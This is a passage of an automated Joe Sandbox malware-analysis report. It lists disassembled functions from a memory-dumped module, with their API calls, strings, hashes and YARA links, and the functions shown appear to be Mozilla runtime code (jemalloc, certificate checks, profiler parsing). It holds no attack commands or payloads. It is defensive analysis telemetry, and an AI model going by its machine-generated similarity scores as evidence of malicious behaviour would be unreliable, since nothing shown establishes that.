CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6CB96DFF
CertFreeCertificateContext.CRYPT32(00000000), ref: 6CB96E10
CryptMsgClose.CRYPT32(00000000), ref: 6CB96E27
CertCloseStore.CRYPT32(00000000,00000000), ref: 6CB96E34
CreateFileW.KERNEL32 ref: 6CB96EF9
moz_xmalloc.MOZGLUE(00000000), ref: 6CB96F7D
memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6CB96F8C
memset.VCRUNTIME140(00000002,00000000,00000208), ref: 6CB9709D
CryptQueryObject.CRYPT32(00000001,00000002,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6CB97103
free.MOZGLUE(00000000), ref: 6CB97153
CloseHandle.KERNEL32(?), ref: 6CB97176
__Init_thread_footer.LIBCMT ref: 6CB97209
__Init_thread_footer.LIBCMT ref: 6CB9723A
__Init_thread_footer.LIBCMT ref: 6CB9726B
__Init_thread_footer.LIBCMT ref: 6CB9729C
__Init_thread_footer.LIBCMT ref: 6CB972DC
__Init_thread_footer.LIBCMT ref: 6CB9730D
memset.VCRUNTIME140(?,00000000,00000110), ref: 6CB973C2
VerSetConditionMask.NTDLL ref: 6CB973F3
VerSetConditionMask.NTDLL ref: 6CB973FF
VerSetConditionMask.NTDLL ref: 6CB97406
VerSetConditionMask.NTDLL ref: 6CB9740D
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6CB9741A
moz_xmalloc.MOZGLUE(?), ref: 6CB9755A
memset.VCRUNTIME140(00000000,00000000,?), ref: 6CB97568
CryptBinaryToStringW.CRYPT32(00000000,00000000,4000000C,00000000,?), ref: 6CB97585
_wcsupr_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6CB97598
free.MOZGLUE(00000000), ref: 6CB975AC

Part of subcall function 6CBBAB89: EnterCriticalSection.KERNEL32(6CC0E370,?,?,?,6CB834DE,6CC0F6CC,?,?,?,?,?,?,?,6CB83284), ref: 6CBBAB94
Part of subcall function 6CBBAB89: LeaveCriticalSection.KERNEL32(6CC0E370,?,6CB834DE,6CC0F6CC,?,?,?,?,?,?,?,6CB83284,?,?,6CBA56F6), ref: 6CBBABD1

Strings

SHA256, xrefs: 6CB96EC0
(, xrefs: 6CB9768A
wintrust.dll, xrefs: 6CB972CD
CryptCATAdminReleaseCatalogContext, xrefs: 6CB972C8

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: CryptInit_thread_footermemset$Cert$ConditionMaskmoz_xmalloc$CloseStringfree$CertificateCriticalNameObjectParamQuerySectionStore$BinaryContextCreateEnterFileFindFreeHandleInfoLeaveVerifyVersion_wcsupr_smalloc
String ID: ($CryptCATAdminReleaseCatalogContext$SHA256$wintrust.dll
API String ID: 3256780453-3980470659
Opcode ID: a93cd282fc7ba0d941c70cc62f19e6b606ea880841a94a6530a58254c93c8adc
Instruction ID: e96272b5f1a74eb44c049db8332de70c82d265470ad5092814f85c0a1df8ff93
Opcode Fuzzy Hash: a93cd282fc7ba0d941c70cc62f19e6b606ea880841a94a6530a58254c93c8adc
Instruction Fuzzy Hash: FB52C3B1A002949FEB21DF64CC84BAA77F8FF46704F1141ADE909A7640DB71AE85CF91

Function 6CBC0DD0 Relevance: 83.9, APIs: 36, Strings: 10, Instructions: 3368COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6CBC0F1F
LeaveCriticalSection.KERNEL32(?), ref: 6CBC0F99
memcpy.VCRUNTIME140(?,?,?), ref: 6CBC0FB7
EnterCriticalSection.KERNEL32(?), ref: 6CBC0FE9
memset.VCRUNTIME140(?,000000E5,00000000), ref: 6CBC1031
LeaveCriticalSection.KERNEL32(?), ref: 6CBC10D0
EnterCriticalSection.KERNEL32(?), ref: 6CBC117D
memset.VCRUNTIME140(?,000000E5,?), ref: 6CBC1C39
EnterCriticalSection.KERNEL32(6CC0E744), ref: 6CBC3391
LeaveCriticalSection.KERNEL32(6CC0E744), ref: 6CBC33CD
LeaveCriticalSection.KERNEL32(?), ref: 6CBC3431
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CBC3437

Strings

MALLOC_OPTIONS, xrefs: 6CBC35FE
: (malloc) Unsupported character in malloc options: ', xrefs: 6CBC3A02
MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.), xrefs: 6CBC37A8
MOZ_CRASH(), xrefs: 6CBC3950
MOZ_RELEASE_ASSERT(!aArena || arena == aArena), xrefs: 6CBC3793
MOZ_RELEASE_ASSERT(mNode), xrefs: 6CBC3559, 6CBC382D, 6CBC3848
MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?), xrefs: 6CBC37BD
MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?), xrefs: 6CBC37D2
<jemalloc>, xrefs: 6CBC3941, 6CBC39F1
Compile-time page size does not divide the runtime one., xrefs: 6CBC3946

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$memset$_errnomemcpy
String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()$MOZ_RELEASE_ASSERT(!aArena || arena == aArena)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.)$MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?)$MOZ_RELEASE_ASSERT(mNode)
API String ID: 3040639385-4173974723
Opcode ID: c9b7029016abb00e83fb6c5c53a2bdfb125c995ffb724b1cf2b3a83d3e5aa603
Instruction ID: 3bd8905642d5bb84fff05d8e416cf79bff6bc877f9f7690a8b6ed31a6a4c024f
Opcode Fuzzy Hash: c9b7029016abb00e83fb6c5c53a2bdfb125c995ffb724b1cf2b3a83d3e5aa603
Instruction Fuzzy Hash: 90536971B057818FD704CF28C58061ABBE1FF89328F29C66DE8699B791D771E841CB82

Function 6CBE34A0 Relevance: 61.0, APIs: 33, Strings: 1, Instructions: 1467COMMON

Download Yara Rule

APIs

floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CBE3527
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CBE355B
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CBE35BC
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CBE35E0
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CBE363A
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CBE3693
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CBE36CD
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CBE3703
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CBE373C
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CBE3775
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CBE378F
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CBE3892
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CBE38BB
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CBE3902
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CBE3939
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CBE3970
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CBE39EF
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CBE3A26
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CBE3AE5
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CBE3E85
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CBE3EBA
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CBE3EE2

Part of subcall function 6CBE6180: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000024), ref: 6CBE61DD
Part of subcall function 6CBE6180: memcpy.VCRUNTIME140(00000000,00000024,-00000070), ref: 6CBE622C

floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CBE40F9
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CBE412F
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CBE4157

Part of subcall function 6CBE6180: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6CBE6250
Part of subcall function 6CBE6180: free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CBE6292

floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CBE441B
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CBE4448
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6CBE484E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6CBE4863
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6CBE4878
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6CBE4896
free.MOZGLUE ref: 6CBE489F

Strings

, xrefs: 6CBE4CD2

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: floor$free$malloc$memcpy
String ID:
API String ID: 3842999660-3916222277
Opcode ID: 50c9661b68a47c9dd09822309b8fd7b64569877cc7512d675de7d34fc45f1633
Instruction ID: 6130ed9b679a751e895742ee390b27d34f4884269b23672bdb9aef46eabade4f
Opcode Fuzzy Hash: 50c9661b68a47c9dd09822309b8fd7b64569877cc7512d675de7d34fc45f1633
Instruction Fuzzy Hash: 6BF23A74908B808FC725CF28C08469AFBF1FFC9358F118A5ED99997711DB729896CB42

Function 6CB964C0 Relevance: 52.9, APIs: 24, Strings: 6, Instructions: 406memoryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(detoured.dll), ref: 6CB964DF
GetModuleHandleW.KERNEL32(_etoured.dll), ref: 6CB964F2
GetModuleHandleW.KERNEL32(nvd3d9wrap.dll), ref: 6CB96505
GetModuleHandleW.KERNEL32(nvdxgiwrap.dll), ref: 6CB96518
GetModuleHandleW.KERNEL32(user32.dll), ref: 6CB9652B
memcpy.VCRUNTIME140(?,?,?), ref: 6CB9671C
GetCurrentProcess.KERNEL32 ref: 6CB96724
FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6CB9672F
GetCurrentProcess.KERNEL32 ref: 6CB96759
FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6CB96764
VirtualProtect.KERNEL32(?,00000000,?,?), ref: 6CB96A80
GetSystemInfo.KERNEL32(?), ref: 6CB96ABE
__Init_thread_footer.LIBCMT ref: 6CB96AD3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CB96AE8
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CB96AF7

Strings

SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows, xrefs: 6CB96798
nvd3d9wrap.dll, xrefs: 6CB96500
detoured.dll, xrefs: 6CB964DA
nvdxgiwrap.dll, xrefs: 6CB96513
_etoured.dll, xrefs: 6CB964ED
user32.dll, xrefs: 6CB96526

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: HandleModule$CacheCurrentFlushInstructionProcessfree$InfoInit_thread_footerProtectSystemVirtualmemcpy
String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows$_etoured.dll$detoured.dll$nvd3d9wrap.dll$nvdxgiwrap.dll$user32.dll
API String ID: 487479824-2878602165
Opcode ID: 82a26ee9311b0b96404b25a536fa0b1b59a65ea878ec726842339c017cacbd5e
Instruction ID: da8c14c279d83c4f1fa6d18ba6ab9e06a37ebe0cf504b4889eb2a2c9d0de2027
Opcode Fuzzy Hash: 82a26ee9311b0b96404b25a536fa0b1b59a65ea878ec726842339c017cacbd5e
Instruction Fuzzy Hash: EEF1E470A052999FDB60CF24CD88B9AB7B4EF47318F1442A9D819E3741E731AE84CF91

Function 6CBEC4A0 Relevance: 35.2, APIs: 26, Instructions: 2665COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CBEC5F9
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CBEC6FB
memset.VCRUNTIME140(?,00000000,00004008), ref: 6CBEC74D
memset.VCRUNTIME140(?,00000000,00004008), ref: 6CBEC7DE
memset.VCRUNTIME140(?,00000000,00004014), ref: 6CBEC9D5
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CBECC76
memset.VCRUNTIME140(?,000000FF,80808081), ref: 6CBECD7A
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CBEDB40
memcpy.VCRUNTIME140(?,?,?), ref: 6CBEDB62
memcpy.VCRUNTIME140(?,?,?), ref: 6CBEDB99
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CBEDD8B
memset.VCRUNTIME140(?,000000FF,80808081), ref: 6CBEDE95
memcpy.VCRUNTIME140(?,?,?), ref: 6CBEE360
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CBEE432
memcpy.VCRUNTIME140(?,?,?), ref: 6CBEE472

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: memset$memcpy
String ID:
API String ID: 368790112-0
Opcode ID: e95889e219d6373aecfb2eefd4d751dbbc7849228894b2438a546aaba38693f8
Instruction ID: 883497214352ae88252048f08555872bfe21373c87f2979236eb5fc1ec782cba
Opcode Fuzzy Hash: e95889e219d6373aecfb2eefd4d751dbbc7849228894b2438a546aaba38693f8
Instruction Fuzzy Hash: 3233CF71E0029ACFCB14CFA8C8806EDBBF2FF89350F284269D955AB755D731A945CB90

Function 6CB9FD00 Relevance: 31.4, APIs: 17, Strings: 3, Instructions: 1360memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6CC0E7B8), ref: 6CB9FF81
LeaveCriticalSection.KERNEL32(6CC0E7B8), ref: 6CBA022D
VirtualAlloc.KERNEL32(?,00100000,00001000,00000004), ref: 6CBA0240
EnterCriticalSection.KERNEL32(6CC0E768), ref: 6CBA025B
LeaveCriticalSection.KERNEL32(6CC0E768), ref: 6CBA027B

Strings

MOZ_RELEASE_ASSERT(mNode), xrefs: 6CB9FE99, 6CB9FEB7, 6CB9FED3, 6CBA0DB8, 6CBA0DD3, 6CBA19B4
: (malloc) Error in VirtualFree(), xrefs: 6CBA0D67, 6CBA0D7B, 6CBA0DAC
<jemalloc>, xrefs: 6CBA0D62, 6CBA0D76, 6CBA0DA7

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$AllocVirtual
String ID: : (malloc) Error in VirtualFree()$<jemalloc>$MOZ_RELEASE_ASSERT(mNode)
API String ID: 618468079-3577267516
Opcode ID: 3408ed3444be70d7b26c44e4ae1b74069cf72a20c2b0d8eca4b4938456ead85f
Instruction ID: 1c4cadbfa72021faea3fe11d8a8ad333fe301a0399cd29c873f662a4ce374c4e
Opcode Fuzzy Hash: 3408ed3444be70d7b26c44e4ae1b74069cf72a20c2b0d8eca4b4938456ead85f
Instruction Fuzzy Hash: 66C2C471A097818FD714CF68C490716BBE1FF85328F28C66DE4AA8B795D771D842CB81

Function 6CBEE680 Relevance: 31.1, APIs: 22, Instructions: 3648COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00004014), ref: 6CBEE811
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CBEEAA8
memset.VCRUNTIME140(?,000000FF,80808081), ref: 6CBEEBD5
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CBEEEF6
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CBEF223
memset.VCRUNTIME140(?,000000FF,80808082,?), ref: 6CBEF322
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CBF0E03
memcpy.VCRUNTIME140(?,?,?,?), ref: 6CBF0E54
memcpy.VCRUNTIME140(?,?,?), ref: 6CBF0EAE
memcpy.VCRUNTIME140(?,?,?), ref: 6CBF0ED4

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: memset$memcpy
String ID:
API String ID: 368790112-0
Opcode ID: 42cd0b35960cbc7cbc8312ba9cad69d2b66acf9ba84ff2a663b5cb2d7ffff899
Instruction ID: be46e1c22119d1403f9ea629dc47696142d14379ae40c84746c2e8b5d35e114e
Opcode Fuzzy Hash: 42cd0b35960cbc7cbc8312ba9cad69d2b66acf9ba84ff2a663b5cb2d7ffff899
Instruction Fuzzy Hash: 9B637071E0029ACFCB14CFA8D8905DDFBB2FF89310F298269D855AB755D730A946CB90

Function 6CBAED10 Relevance: 25.4, APIs: 16, Instructions: 5407COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00010030), ref: 6CBAEE7A
memset.VCRUNTIME140(?,000000FF,80808082,?), ref: 6CBAEFB5
memcpy.VCRUNTIME140(?,?,?,?), ref: 6CBB1695
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CBB16B4
memset.VCRUNTIME140(00000002,000000FF,?,?), ref: 6CBB1770
memset.VCRUNTIME140(?,000000FF,?,?), ref: 6CBB1A3E

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: memset$freemallocmemcpy
String ID:
API String ID: 3693777188-0
Opcode ID: ef2f2068be92e66a131e51daea7b3ffde6f98e7e003115f9c54d758c5129352b
Instruction ID: d555fa98a2b77df3c67cdcb3d6389174e39d4b9942ff4aa36e4f1e6754b43c7e
Opcode Fuzzy Hash: ef2f2068be92e66a131e51daea7b3ffde6f98e7e003115f9c54d758c5129352b
Instruction Fuzzy Hash: 3CB32971E042598FCB14CFA8C990AADB7B2FF49304F1981A9D449BB745DB30AD86CF91

Function 6CB9FEF0 Relevance: 23.8, APIs: 13, Strings: 2, Instructions: 1294memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6CC0E7B8), ref: 6CB9FF81
LeaveCriticalSection.KERNEL32(6CC0E7B8), ref: 6CBA022D
VirtualAlloc.KERNEL32(?,00100000,00001000,00000004), ref: 6CBA0240
EnterCriticalSection.KERNEL32(6CC0E768), ref: 6CBA025B
LeaveCriticalSection.KERNEL32(6CC0E768), ref: 6CBA027B

Strings

MOZ_CRASH(), xrefs: 6CBA0CA7
MOZ_RELEASE_ASSERT(mNode), xrefs: 6CB9FE99, 6CB9FEB7, 6CB9FED3, 6CBA0DB8, 6CBA0DD3, 6CBA19B4, 6CBA1A10

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$AllocVirtual
String ID: MOZ_CRASH()$MOZ_RELEASE_ASSERT(mNode)
API String ID: 618468079-3566792288
Opcode ID: 029ca225f78e8448b0b613ec0d18ffe6ab94048c0d1b001a589d2b30d3b47e94
Instruction ID: 8e78b2111ff92b9268b6e0ef5012307823cab6bde052cdd10b7f74cef6597d98
Opcode Fuzzy Hash: 029ca225f78e8448b0b613ec0d18ffe6ab94048c0d1b001a589d2b30d3b47e94
Instruction Fuzzy Hash: F3B2AD71609781CFD718CF68C590716BBE1EF85328F28C66CE8AA8B795D771D842CB42

Function 6CBD5600 Relevance: 22.0, APIs: 6, Strings: 6, Instructions: 950COMMON

Download Yara Rule

Strings

schema, xrefs: 6CBD606D
data, xrefs: 6CBD6131
ProfileBuffer parse error: %s, xrefs: 6CBD5AC8, 6CBD5CBB
expected a Time entry, xrefs: 6CBD5CB6
expected a Count entry, xrefs: 6CBD5AC3
name, xrefs: 6CBD5E79, 6CBD5E8F

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID:
String ID: ProfileBuffer parse error: %s$data$expected a Count entry$expected a Time entry$name$schema
API String ID: 0-2712937348
Opcode ID: 2ea4ebf37ee29c2faee503ffe12c79caee702aa19bb2e367e91b937258866f8b
Instruction ID: 1dd67f67b1397ccf83837652ea5e190739768f48e56bdd00f88ce42ec17e6ef7
Opcode Fuzzy Hash: 2ea4ebf37ee29c2faee503ffe12c79caee702aa19bb2e367e91b937258866f8b
Instruction Fuzzy Hash: EC9228B16083818FD724CF28C49079ABBE1FFC9308F15891DE5999B751DB31E849CB92

Function 6CBC7E10 Relevance: 17.9, APIs: 6, Strings: 4, Instructions: 403COMMON

Download Yara Rule

Strings

schema, xrefs: 6CBC81E3, 6CBC8311
data, xrefs: 6CBC8280, 6CBC83E1
(pre-xul), xrefs: 6CBC7E88
name, xrefs: 6CBC7ECF, 6CBC8335

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: memcpystrlen
String ID: (pre-xul)$data$name$schema
API String ID: 3412268980-999448898
Opcode ID: 774e81ffa4ce55553cc2451468298e6f7dcde5cac6a56f02a9ff283f40eb2012
Instruction ID: ac5694ba796d2b917ad2bbabef7222505cbdb16732688109e4e5c4d87be5c17c
Opcode Fuzzy Hash: 774e81ffa4ce55553cc2451468298e6f7dcde5cac6a56f02a9ff283f40eb2012
Instruction Fuzzy Hash: DDE16071B043848BC710CF68884066FFBE9FB85758F14892DE899D7790EBB1DD098B92

Function 6CBAD4D0 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 251COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6CC0E784,?,?,?,?,?,?,?,00000000,75572FE0,00000001,?,6CBBD1C5), ref: 6CBAD4F2
LeaveCriticalSection.KERNEL32(6CC0E784,?,?,?,?,?,?,?,00000000,75572FE0,00000001,?,6CBBD1C5), ref: 6CBAD50B

Part of subcall function 6CB8CFE0: EnterCriticalSection.KERNEL32(6CC0E784), ref: 6CB8CFF6
Part of subcall function 6CB8CFE0: LeaveCriticalSection.KERNEL32(6CC0E784), ref: 6CB8D026

InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,75572FE0,00000001,?,6CBBD1C5), ref: 6CBAD52E
EnterCriticalSection.KERNEL32(6CC0E7DC), ref: 6CBAD690
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6CBAD6A6
LeaveCriticalSection.KERNEL32(6CC0E7DC), ref: 6CBAD712
LeaveCriticalSection.KERNEL32(6CC0E784,?,?,?,?,?,?,?,00000000,75572FE0,00000001,?,6CBBD1C5), ref: 6CBAD751
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6CBAD7EA

Strings

: (malloc) Error initializing arena, xrefs: 6CBAD82C
<jemalloc>, xrefs: 6CBAD827

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

